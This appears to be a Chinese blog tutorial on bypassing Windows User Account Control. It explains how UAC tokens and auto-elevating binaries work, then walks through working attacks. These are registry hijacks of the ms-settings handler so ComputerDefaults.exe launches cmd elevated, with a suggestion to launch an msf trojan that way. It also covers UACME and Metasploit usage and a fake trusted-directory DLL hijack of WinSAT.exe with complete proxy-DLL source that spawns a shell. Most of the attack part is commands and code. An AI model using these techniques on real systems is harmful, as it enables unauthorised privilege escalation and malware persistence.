Bypass UAC

April 15, 2023 22597

Bypass UAC

UAC

首先得知道UAC是啥

在windows vista以后windows推出

UAC useraccount control 用户账户控制

大概理解一下就是这个东西

image-20221212132740833

就是每次我们安装东西时弹出来的一个窗口

那为啥会弹出这个提示

虽然我们本机用户是在管理员组

但是,管理员在正常情况下是以低权限执行任务的,这个状态是被保护管理员状态

当管理员要执行高权限操作时,就会弹出UAC

作用

UAC作用:阻止自动安装未经授权的应用,并且防止意外更改系统设置

UAC弹出机制

有的操作不会弹出UAC,有的操作会弹出UAC

UAC会限制所有的用户

普通用户登陆后,系统会创建一个标准用户访问令牌

管理员组用户登陆后,系统会创建两个单独的访问令牌:标准用户访问令牌和管理员访问令牌

标准用户访问令牌用于实现普通操作

当需要执行高权限操作时,就会触发UAC,出现弹窗,同意后即可使用管理员访问令牌

当一个非RID为500的账户, 登陆之后用户会被分到两个令牌, 一个是普通访问令牌, 一个是管理员访问令牌

普通访问令牌和管理员访问令牌差不多, 管理员令牌只是多了windows管理特权和相关的SID

当用户只执行普通程序时, 只使用普通访问令牌

当要进行高权限操作时, 就会提示用户, 这是一个高权限操作, 需要用户批准, 同意之后就用管理员令牌进行访问

Bypass UAC手法

在一些场景中,比如我们拿到的用户是管理员组

虽然是属于管理员组,但是操作还是会受限制,并没有相应我们想得到的管理员权限,此时就可以考虑绕过UAC

方法有好几种:

利用UAC白名单

DLL劫持

利用COM接口

模拟可信任目录

UACME

MSF

UAC白名单

windows中UAC是有白名单机制的,即一些白名单中的程序会直接使用管理员权限运行

比如:wusa.exe rundll32.exe等等

渗透测试过程中可以使用DLL劫持、DLL注入、注册表劫持等方法进行绕过UAC

微软官方提供了专门工具来寻找白名单进程,SigcheckStrings

在白名单的程序一般Manifest数据中的autoElevate的值为True

Sigcheck 可以检查某个程序是否有autoElevate属性

Strings 可以找到所有具有autoElevate属性的值

Sigcheck

1
sigcheck64.exe /accepteula -m C:\Windows\System32\ComputerDefaults.exe

检查ComputerDefaults.exe是否在白名单中

image-20221225155913502

证明在白名单中

Strings

1
strings64.exe /accepteula -s C:\Windows\System32\*.exe | findstr /i "autoElevate"

列出了一堆白名单

image-20221225165655738

以 ComputerDefaults.exe 为例子

首先打开 process monitor 监听 ComputerDefaults.exe

image-20221226112638791

空白处需要输入 ComputerDefaults.exe

之后直接运行 ComputerDefaults.exe 即可

发现注册表操作非常多,具体咋看,我也不清楚,参考相关书籍才知道一点点

image-20221225202240966

查看书籍才知

ComputerDefaults.exe 这个进程执行时会先查询注册表HKCU\Software\Classes\ms-settings\Shell\Open\Command里面的数据

发现路径不存在后,继续查询注册表 HKCR\ms-settings\Shell\Open\Command\DelegateExecute 里面的数据并且读取

因为普通标准用户对注册表键值有修改权限,所以执行命令,来将要执行程序的路径写入默认值和DelegateExecute值

1
2
3
reg add "HKCU\Software\Classes\ms-settings\Shell\Open\Command" /d "C:\Windows\System32\cmd.exe" /f

reg add "HKCU\Software\Classes\ms-settings\Shell\Open\Command" /v DelegateExecute /t REG_SZ /d "C:\Windows\System32\cmd.exe" /f

写入之后再次运行 ComputerDefaults.exe

image-20221225204123684

没有经过UAC就直接弹出cmd窗口

上面是写入cmd,我们可以换成其他的比如,msf的木马

因为是管理员权限运行,所以,直接就可以上线msf,然后getsystem来进行提权

UACME

UACME是一个专门绕过UAC的项目,目前为止包含76种绕过UAC的方法

在UACME中,每一种方法都有一个编号,由主程序Akagi.exe统一调用

使用方法

1
2
3
4
akagi.exe [key] [param]

#key为要使用的方法编号
#param为绕过uac之后运行的程序或者执行的命令,默认是一个cmd窗口

MSF

msf款工具里面也有一些bypass uac的利用模块

image-20221226135828158

使用对应模块,即可提权

结合DLL劫持来Bypass

我们可以想到, UAC白名单的程序会加载DLL文件, 那么我们可以通过劫持UAC白名单的DLL文件, 来进行逃过UAC,从而权限提升

但是! UAC白名单加载的这些DLL文件, 基本上都是位于可信任目录中, 普通用户想要修改可信任目录, 不太现实

那么我们可以模拟可信任根目录

模拟可信任根目录

首先得知道, 一个程序想要提升权限, 需要的条件

当白名单程序要求权限提升时

  1. 首先会检查程序的Manifest信息的autoElevate的值是否为True
  2. 再检查可执行文件的签名, 就不会存在冒充可执行文件的可能
  3. 最后就是检查程序是否位于可信任根目录

上面三个条件缺一不可

前两个条件, 容易满足

找到一个白名单程序, 复制该程序即可

逃过可信任根目录

系统检查可信任根目录的规则

1
检查时, 系统会执行相关的函数, 来去掉可执行文件路径的空格

那么我们就可以通过路径的命名来模拟一个可信任根目录

自己创建一个路径, 包含空格

1
C:\Windows \System32

复现WinSAT.exe

根据上面原理, 来劫持一个DLL程序

模拟可信任根目录

1
2
3
md "\\?\C:\Windows "
md "\\?\C:\Windows \System32"
copy C:\Windows\System32\WinSAT.exe "\\?\C:\Windows \System32\WinSAT.exe"

image-20230414215553353

创建成功

image-20230414215624417

分析DLL

运行模拟可信任根目录的文件WinSAT.exe, 并且开启process monitor分析其DLL文件

image-20230414220709231

发现我们模拟可信任根目录的DLL文件, 加载全部失败了

加载失败的DLL文件

image-20230414220843337

选择WINMM.dll进行劫持

使用Get-Exports.ps1脚本导出导出函数

1
2
3
import-moudle .\Get-Exports.ps1

Get-Exports -DllPath c:\Windows\system32\winmm.dll -ExportsToCpp C:\Users\wo\Desktop\export.txt

查看导出函数, 生成C++代码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
// dllmain.cpp : 定义 DLL 应用程序的入口点。
#include "pch.h"

#include <stdlib.h>

#include<Windows.h>

#include<iostream>

using namespace std;



#pragma comment (linker, "/export:CloseDriver=[FORWARD_DLL_HERE].CloseDriver,@4")
#pragma comment (linker, "/export:DefDriverProc=[FORWARD_DLL_HERE].DefDriverProc,@5")
#pragma comment (linker, "/export:DriverCallback=[FORWARD_DLL_HERE].DriverCallback,@6")
#pragma comment (linker, "/export:DrvGetModuleHandle=[FORWARD_DLL_HERE].DrvGetModuleHandle,@7")
#pragma comment (linker, "/export:GetDriverModuleHandle=[FORWARD_DLL_HERE].GetDriverModuleHandle,@8")
#pragma comment (linker, "/export:OpenDriver=[FORWARD_DLL_HERE].OpenDriver,@9")
#pragma comment (linker, "/export:PlaySound=[FORWARD_DLL_HERE].PlaySound,@10")
#pragma comment (linker, "/export:PlaySoundA=[FORWARD_DLL_HERE].PlaySoundA,@11")
#pragma comment (linker, "/export:PlaySoundW=[FORWARD_DLL_HERE].PlaySoundW,@12")
#pragma comment (linker, "/export:SendDriverMessage=[FORWARD_DLL_HERE].SendDriverMessage,@13")
#pragma comment (linker, "/export:WOWAppExit=[FORWARD_DLL_HERE].WOWAppExit,@14")
#pragma comment (linker, "/export:auxGetDevCapsA=[FORWARD_DLL_HERE].auxGetDevCapsA,@15")
#pragma comment (linker, "/export:auxGetDevCapsW=[FORWARD_DLL_HERE].auxGetDevCapsW,@16")
#pragma comment (linker, "/export:auxGetNumDevs=[FORWARD_DLL_HERE].auxGetNumDevs,@17")
#pragma comment (linker, "/export:auxGetVolume=[FORWARD_DLL_HERE].auxGetVolume,@18")
#pragma comment (linker, "/export:auxOutMessage=[FORWARD_DLL_HERE].auxOutMessage,@19")
#pragma comment (linker, "/export:auxSetVolume=[FORWARD_DLL_HERE].auxSetVolume,@20")
#pragma comment (linker, "/export:joyConfigChanged=[FORWARD_DLL_HERE].joyConfigChanged,@21")
#pragma comment (linker, "/export:joyGetDevCapsA=[FORWARD_DLL_HERE].joyGetDevCapsA,@22")
#pragma comment (linker, "/export:joyGetDevCapsW=[FORWARD_DLL_HERE].joyGetDevCapsW,@23")
#pragma comment (linker, "/export:joyGetNumDevs=[FORWARD_DLL_HERE].joyGetNumDevs,@24")
#pragma comment (linker, "/export:joyGetPos=[FORWARD_DLL_HERE].joyGetPos,@25")
#pragma comment (linker, "/export:joyGetPosEx=[FORWARD_DLL_HERE].joyGetPosEx,@26")
#pragma comment (linker, "/export:joyGetThreshold=[FORWARD_DLL_HERE].joyGetThreshold,@27")
#pragma comment (linker, "/export:joyReleaseCapture=[FORWARD_DLL_HERE].joyReleaseCapture,@28")
#pragma comment (linker, "/export:joySetCapture=[FORWARD_DLL_HERE].joySetCapture,@29")
#pragma comment (linker, "/export:joySetThreshold=[FORWARD_DLL_HERE].joySetThreshold,@30")
#pragma comment (linker, "/export:mciDriverNotify=[FORWARD_DLL_HERE].mciDriverNotify,@31")
#pragma comment (linker, "/export:mciDriverYield=[FORWARD_DLL_HERE].mciDriverYield,@32")
#pragma comment (linker, "/export:mciExecute=[FORWARD_DLL_HERE].mciExecute,@3")
#pragma comment (linker, "/export:mciFreeCommandResource=[FORWARD_DLL_HERE].mciFreeCommandResource,@33")
#pragma comment (linker, "/export:mciGetCreatorTask=[FORWARD_DLL_HERE].mciGetCreatorTask,@34")
#pragma comment (linker, "/export:mciGetDeviceIDA=[FORWARD_DLL_HERE].mciGetDeviceIDA,@35")
#pragma comment (linker, "/export:mciGetDeviceIDFromElementIDA=[FORWARD_DLL_HERE].mciGetDeviceIDFromElementIDA,@36")
#pragma comment (linker, "/export:mciGetDeviceIDFromElementIDW=[FORWARD_DLL_HERE].mciGetDeviceIDFromElementIDW,@37")
#pragma comment (linker, "/export:mciGetDeviceIDW=[FORWARD_DLL_HERE].mciGetDeviceIDW,@38")
#pragma comment (linker, "/export:mciGetDriverData=[FORWARD_DLL_HERE].mciGetDriverData,@39")
#pragma comment (linker, "/export:mciGetErrorStringA=[FORWARD_DLL_HERE].mciGetErrorStringA,@40")
#pragma comment (linker, "/export:mciGetErrorStringW=[FORWARD_DLL_HERE].mciGetErrorStringW,@41")
#pragma comment (linker, "/export:mciGetYieldProc=[FORWARD_DLL_HERE].mciGetYieldProc,@42")
#pragma comment (linker, "/export:mciLoadCommandResource=[FORWARD_DLL_HERE].mciLoadCommandResource,@43")
#pragma comment (linker, "/export:mciSendCommandA=[FORWARD_DLL_HERE].mciSendCommandA,@44")
#pragma comment (linker, "/export:mciSendCommandW=[FORWARD_DLL_HERE].mciSendCommandW,@45")
#pragma comment (linker, "/export:mciSendStringA=[FORWARD_DLL_HERE].mciSendStringA,@46")
#pragma comment (linker, "/export:mciSendStringW=[FORWARD_DLL_HERE].mciSendStringW,@47")
#pragma comment (linker, "/export:mciSetDriverData=[FORWARD_DLL_HERE].mciSetDriverData,@48")
#pragma comment (linker, "/export:mciSetYieldProc=[FORWARD_DLL_HERE].mciSetYieldProc,@49")
#pragma comment (linker, "/export:midiConnect=[FORWARD_DLL_HERE].midiConnect,@50")
#pragma comment (linker, "/export:midiDisconnect=[FORWARD_DLL_HERE].midiDisconnect,@51")
#pragma comment (linker, "/export:midiInAddBuffer=[FORWARD_DLL_HERE].midiInAddBuffer,@52")
#pragma comment (linker, "/export:midiInClose=[FORWARD_DLL_HERE].midiInClose,@53")
#pragma comment (linker, "/export:midiInGetDevCapsA=[FORWARD_DLL_HERE].midiInGetDevCapsA,@54")
#pragma comment (linker, "/export:midiInGetDevCapsW=[FORWARD_DLL_HERE].midiInGetDevCapsW,@55")
#pragma comment (linker, "/export:midiInGetErrorTextA=[FORWARD_DLL_HERE].midiInGetErrorTextA,@56")
#pragma comment (linker, "/export:midiInGetErrorTextW=[FORWARD_DLL_HERE].midiInGetErrorTextW,@57")
#pragma comment (linker, "/export:midiInGetID=[FORWARD_DLL_HERE].midiInGetID,@58")
#pragma comment (linker, "/export:midiInGetNumDevs=[FORWARD_DLL_HERE].midiInGetNumDevs,@59")
#pragma comment (linker, "/export:midiInMessage=[FORWARD_DLL_HERE].midiInMessage,@60")
#pragma comment (linker, "/export:midiInOpen=[FORWARD_DLL_HERE].midiInOpen,@61")
#pragma comment (linker, "/export:midiInPrepareHeader=[FORWARD_DLL_HERE].midiInPrepareHeader,@62")
#pragma comment (linker, "/export:midiInReset=[FORWARD_DLL_HERE].midiInReset,@63")
#pragma comment (linker, "/export:midiInStart=[FORWARD_DLL_HERE].midiInStart,@64")
#pragma comment (linker, "/export:midiInStop=[FORWARD_DLL_HERE].midiInStop,@65")
#pragma comment (linker, "/export:midiInUnprepareHeader=[FORWARD_DLL_HERE].midiInUnprepareHeader,@66")
#pragma comment (linker, "/export:midiOutCacheDrumPatches=[FORWARD_DLL_HERE].midiOutCacheDrumPatches,@67")
#pragma comment (linker, "/export:midiOutCachePatches=[FORWARD_DLL_HERE].midiOutCachePatches,@68")
#pragma comment (linker, "/export:midiOutClose=[FORWARD_DLL_HERE].midiOutClose,@69")
#pragma comment (linker, "/export:midiOutGetDevCapsA=[FORWARD_DLL_HERE].midiOutGetDevCapsA,@70")
#pragma comment (linker, "/export:midiOutGetDevCapsW=[FORWARD_DLL_HERE].midiOutGetDevCapsW,@71")
#pragma comment (linker, "/export:midiOutGetErrorTextA=[FORWARD_DLL_HERE].midiOutGetErrorTextA,@72")
#pragma comment (linker, "/export:midiOutGetErrorTextW=[FORWARD_DLL_HERE].midiOutGetErrorTextW,@73")
#pragma comment (linker, "/export:midiOutGetID=[FORWARD_DLL_HERE].midiOutGetID,@74")
#pragma comment (linker, "/export:midiOutGetNumDevs=[FORWARD_DLL_HERE].midiOutGetNumDevs,@75")
#pragma comment (linker, "/export:midiOutGetVolume=[FORWARD_DLL_HERE].midiOutGetVolume,@76")
#pragma comment (linker, "/export:midiOutLongMsg=[FORWARD_DLL_HERE].midiOutLongMsg,@77")
#pragma comment (linker, "/export:midiOutMessage=[FORWARD_DLL_HERE].midiOutMessage,@78")
#pragma comment (linker, "/export:midiOutOpen=[FORWARD_DLL_HERE].midiOutOpen,@79")
#pragma comment (linker, "/export:midiOutPrepareHeader=[FORWARD_DLL_HERE].midiOutPrepareHeader,@80")
#pragma comment (linker, "/export:midiOutReset=[FORWARD_DLL_HERE].midiOutReset,@81")
#pragma comment (linker, "/export:midiOutSetVolume=[FORWARD_DLL_HERE].midiOutSetVolume,@82")
#pragma comment (linker, "/export:midiOutShortMsg=[FORWARD_DLL_HERE].midiOutShortMsg,@83")
#pragma comment (linker, "/export:midiOutUnprepareHeader=[FORWARD_DLL_HERE].midiOutUnprepareHeader,@84")
#pragma comment (linker, "/export:midiStreamClose=[FORWARD_DLL_HERE].midiStreamClose,@85")
#pragma comment (linker, "/export:midiStreamOpen=[FORWARD_DLL_HERE].midiStreamOpen,@86")
#pragma comment (linker, "/export:midiStreamOut=[FORWARD_DLL_HERE].midiStreamOut,@87")
#pragma comment (linker, "/export:midiStreamPause=[FORWARD_DLL_HERE].midiStreamPause,@88")
#pragma comment (linker, "/export:midiStreamPosition=[FORWARD_DLL_HERE].midiStreamPosition,@89")
#pragma comment (linker, "/export:midiStreamProperty=[FORWARD_DLL_HERE].midiStreamProperty,@90")
#pragma comment (linker, "/export:midiStreamRestart=[FORWARD_DLL_HERE].midiStreamRestart,@91")
#pragma comment (linker, "/export:midiStreamStop=[FORWARD_DLL_HERE].midiStreamStop,@92")
#pragma comment (linker, "/export:mixerClose=[FORWARD_DLL_HERE].mixerClose,@93")
#pragma comment (linker, "/export:mixerGetControlDetailsA=[FORWARD_DLL_HERE].mixerGetControlDetailsA,@94")
#pragma comment (linker, "/export:mixerGetControlDetailsW=[FORWARD_DLL_HERE].mixerGetControlDetailsW,@95")
#pragma comment (linker, "/export:mixerGetDevCapsA=[FORWARD_DLL_HERE].mixerGetDevCapsA,@96")
#pragma comment (linker, "/export:mixerGetDevCapsW=[FORWARD_DLL_HERE].mixerGetDevCapsW,@97")
#pragma comment (linker, "/export:mixerGetID=[FORWARD_DLL_HERE].mixerGetID,@98")
#pragma comment (linker, "/export:mixerGetLineControlsA=[FORWARD_DLL_HERE].mixerGetLineControlsA,@99")
#pragma comment (linker, "/export:mixerGetLineControlsW=[FORWARD_DLL_HERE].mixerGetLineControlsW,@100")
#pragma comment (linker, "/export:mixerGetLineInfoA=[FORWARD_DLL_HERE].mixerGetLineInfoA,@101")
#pragma comment (linker, "/export:mixerGetLineInfoW=[FORWARD_DLL_HERE].mixerGetLineInfoW,@102")
#pragma comment (linker, "/export:mixerGetNumDevs=[FORWARD_DLL_HERE].mixerGetNumDevs,@103")
#pragma comment (linker, "/export:mixerMessage=[FORWARD_DLL_HERE].mixerMessage,@104")
#pragma comment (linker, "/export:mixerOpen=[FORWARD_DLL_HERE].mixerOpen,@105")
#pragma comment (linker, "/export:mixerSetControlDetails=[FORWARD_DLL_HERE].mixerSetControlDetails,@106")
#pragma comment (linker, "/export:mmDrvInstall=[FORWARD_DLL_HERE].mmDrvInstall,@107")
#pragma comment (linker, "/export:mmGetCurrentTask=[FORWARD_DLL_HERE].mmGetCurrentTask,@108")
#pragma comment (linker, "/export:mmTaskBlock=[FORWARD_DLL_HERE].mmTaskBlock,@109")
#pragma comment (linker, "/export:mmTaskCreate=[FORWARD_DLL_HERE].mmTaskCreate,@110")
#pragma comment (linker, "/export:mmTaskSignal=[FORWARD_DLL_HERE].mmTaskSignal,@111")
#pragma comment (linker, "/export:mmTaskYield=[FORWARD_DLL_HERE].mmTaskYield,@112")
#pragma comment (linker, "/export:mmioAdvance=[FORWARD_DLL_HERE].mmioAdvance,@113")
#pragma comment (linker, "/export:mmioAscend=[FORWARD_DLL_HERE].mmioAscend,@114")
#pragma comment (linker, "/export:mmioClose=[FORWARD_DLL_HERE].mmioClose,@115")
#pragma comment (linker, "/export:mmioCreateChunk=[FORWARD_DLL_HERE].mmioCreateChunk,@116")
#pragma comment (linker, "/export:mmioDescend=[FORWARD_DLL_HERE].mmioDescend,@117")
#pragma comment (linker, "/export:mmioFlush=[FORWARD_DLL_HERE].mmioFlush,@118")
#pragma comment (linker, "/export:mmioGetInfo=[FORWARD_DLL_HERE].mmioGetInfo,@119")
#pragma comment (linker, "/export:mmioInstallIOProcA=[FORWARD_DLL_HERE].mmioInstallIOProcA,@120")
#pragma comment (linker, "/export:mmioInstallIOProcW=[FORWARD_DLL_HERE].mmioInstallIOProcW,@121")
#pragma comment (linker, "/export:mmioOpenA=[FORWARD_DLL_HERE].mmioOpenA,@122")
#pragma comment (linker, "/export:mmioOpenW=[FORWARD_DLL_HERE].mmioOpenW,@123")
#pragma comment (linker, "/export:mmioRead=[FORWARD_DLL_HERE].mmioRead,@124")
#pragma comment (linker, "/export:mmioRenameA=[FORWARD_DLL_HERE].mmioRenameA,@125")
#pragma comment (linker, "/export:mmioRenameW=[FORWARD_DLL_HERE].mmioRenameW,@126")
#pragma comment (linker, "/export:mmioSeek=[FORWARD_DLL_HERE].mmioSeek,@127")
#pragma comment (linker, "/export:mmioSendMessage=[FORWARD_DLL_HERE].mmioSendMessage,@128")
#pragma comment (linker, "/export:mmioSetBuffer=[FORWARD_DLL_HERE].mmioSetBuffer,@129")
#pragma comment (linker, "/export:mmioSetInfo=[FORWARD_DLL_HERE].mmioSetInfo,@130")
#pragma comment (linker, "/export:mmioStringToFOURCCA=[FORWARD_DLL_HERE].mmioStringToFOURCCA,@131")
#pragma comment (linker, "/export:mmioStringToFOURCCW=[FORWARD_DLL_HERE].mmioStringToFOURCCW,@132")
#pragma comment (linker, "/export:mmioWrite=[FORWARD_DLL_HERE].mmioWrite,@133")
#pragma comment (linker, "/export:mmsystemGetVersion=[FORWARD_DLL_HERE].mmsystemGetVersion,@134")
#pragma comment (linker, "/export:sndPlaySoundA=[FORWARD_DLL_HERE].sndPlaySoundA,@135")
#pragma comment (linker, "/export:sndPlaySoundW=[FORWARD_DLL_HERE].sndPlaySoundW,@136")
#pragma comment (linker, "/export:timeBeginPeriod=[FORWARD_DLL_HERE].timeBeginPeriod,@137")
#pragma comment (linker, "/export:timeEndPeriod=[FORWARD_DLL_HERE].timeEndPeriod,@138")
#pragma comment (linker, "/export:timeGetDevCaps=[FORWARD_DLL_HERE].timeGetDevCaps,@139")
#pragma comment (linker, "/export:timeGetSystemTime=[FORWARD_DLL_HERE].timeGetSystemTime,@140")
#pragma comment (linker, "/export:timeGetTime=[FORWARD_DLL_HERE].timeGetTime,@141")
#pragma comment (linker, "/export:timeKillEvent=[FORWARD_DLL_HERE].timeKillEvent,@142")
#pragma comment (linker, "/export:timeSetEvent=[FORWARD_DLL_HERE].timeSetEvent,@143")
#pragma comment (linker, "/export:waveInAddBuffer=[FORWARD_DLL_HERE].waveInAddBuffer,@144")
#pragma comment (linker, "/export:waveInClose=[FORWARD_DLL_HERE].waveInClose,@145")
#pragma comment (linker, "/export:waveInGetDevCapsA=[FORWARD_DLL_HERE].waveInGetDevCapsA,@146")
#pragma comment (linker, "/export:waveInGetDevCapsW=[FORWARD_DLL_HERE].waveInGetDevCapsW,@147")
#pragma comment (linker, "/export:waveInGetErrorTextA=[FORWARD_DLL_HERE].waveInGetErrorTextA,@148")
#pragma comment (linker, "/export:waveInGetErrorTextW=[FORWARD_DLL_HERE].waveInGetErrorTextW,@149")
#pragma comment (linker, "/export:waveInGetID=[FORWARD_DLL_HERE].waveInGetID,@150")
#pragma comment (linker, "/export:waveInGetNumDevs=[FORWARD_DLL_HERE].waveInGetNumDevs,@151")
#pragma comment (linker, "/export:waveInGetPosition=[FORWARD_DLL_HERE].waveInGetPosition,@152")
#pragma comment (linker, "/export:waveInMessage=[FORWARD_DLL_HERE].waveInMessage,@153")
#pragma comment (linker, "/export:waveInOpen=[FORWARD_DLL_HERE].waveInOpen,@154")
#pragma comment (linker, "/export:waveInPrepareHeader=[FORWARD_DLL_HERE].waveInPrepareHeader,@155")
#pragma comment (linker, "/export:waveInReset=[FORWARD_DLL_HERE].waveInReset,@156")
#pragma comment (linker, "/export:waveInStart=[FORWARD_DLL_HERE].waveInStart,@157")
#pragma comment (linker, "/export:waveInStop=[FORWARD_DLL_HERE].waveInStop,@158")
#pragma comment (linker, "/export:waveInUnprepareHeader=[FORWARD_DLL_HERE].waveInUnprepareHeader,@159")
#pragma comment (linker, "/export:waveOutBreakLoop=[FORWARD_DLL_HERE].waveOutBreakLoop,@160")
#pragma comment (linker, "/export:waveOutClose=[FORWARD_DLL_HERE].waveOutClose,@161")
#pragma comment (linker, "/export:waveOutGetDevCapsA=[FORWARD_DLL_HERE].waveOutGetDevCapsA,@162")
#pragma comment (linker, "/export:waveOutGetDevCapsW=[FORWARD_DLL_HERE].waveOutGetDevCapsW,@163")
#pragma comment (linker, "/export:waveOutGetErrorTextA=[FORWARD_DLL_HERE].waveOutGetErrorTextA,@164")
#pragma comment (linker, "/export:waveOutGetErrorTextW=[FORWARD_DLL_HERE].waveOutGetErrorTextW,@165")
#pragma comment (linker, "/export:waveOutGetID=[FORWARD_DLL_HERE].waveOutGetID,@166")
#pragma comment (linker, "/export:waveOutGetNumDevs=[FORWARD_DLL_HERE].waveOutGetNumDevs,@167")
#pragma comment (linker, "/export:waveOutGetPitch=[FORWARD_DLL_HERE].waveOutGetPitch,@168")
#pragma comment (linker, "/export:waveOutGetPlaybackRate=[FORWARD_DLL_HERE].waveOutGetPlaybackRate,@169")
#pragma comment (linker, "/export:waveOutGetPosition=[FORWARD_DLL_HERE].waveOutGetPosition,@170")
#pragma comment (linker, "/export:waveOutGetVolume=[FORWARD_DLL_HERE].waveOutGetVolume,@171")
#pragma comment (linker, "/export:waveOutMessage=[FORWARD_DLL_HERE].waveOutMessage,@172")
#pragma comment (linker, "/export:waveOutOpen=[FORWARD_DLL_HERE].waveOutOpen,@173")
#pragma comment (linker, "/export:waveOutPause=[FORWARD_DLL_HERE].waveOutPause,@174")
#pragma comment (linker, "/export:waveOutPrepareHeader=[FORWARD_DLL_HERE].waveOutPrepareHeader,@175")
#pragma comment (linker, "/export:waveOutReset=[FORWARD_DLL_HERE].waveOutReset,@176")
#pragma comment (linker, "/export:waveOutRestart=[FORWARD_DLL_HERE].waveOutRestart,@177")
#pragma comment (linker, "/export:waveOutSetPitch=[FORWARD_DLL_HERE].waveOutSetPitch,@178")
#pragma comment (linker, "/export:waveOutSetPlaybackRate=[FORWARD_DLL_HERE].waveOutSetPlaybackRate,@179")
#pragma comment (linker, "/export:waveOutSetVolume=[FORWARD_DLL_HERE].waveOutSetVolume,@180")
#pragma comment (linker, "/export:waveOutUnprepareHeader=[FORWARD_DLL_HERE].waveOutUnprepareHeader,@181")
#pragma comment (linker, "/export:waveOutWrite=[FORWARD_DLL_HERE].waveOutWrite,@182")


BOOL WINAPI DllMain(HINSTANCE hInst, DWORD reason, LPVOID)
{
	system("start cmd.exe");

	return TRUE;
}

编译之后生成DLL文件

image-20230415164041781

然后将DLL文件改名为winmm.dll

放入模拟可信任根目录

最后打开模拟可信任根目录中的WinSAT.exe, 发现会弹出提示, 没有[FORWARD_DLL_HERE].dll文件

这个地方卡了一下

需要把真正的winmm.dll文件复制一份, 重新命名为[FORWARD_DLL_HERE].dll, 放入模拟可信任根目录

image-20230415164326293

然后运行发现缺少两个DLL文件, 把原始目录的DLL文件复制一份放到模拟根目录就行

点击运行WinSAT.exe即可弹出cmd窗口

image-20230415164408617

查看评论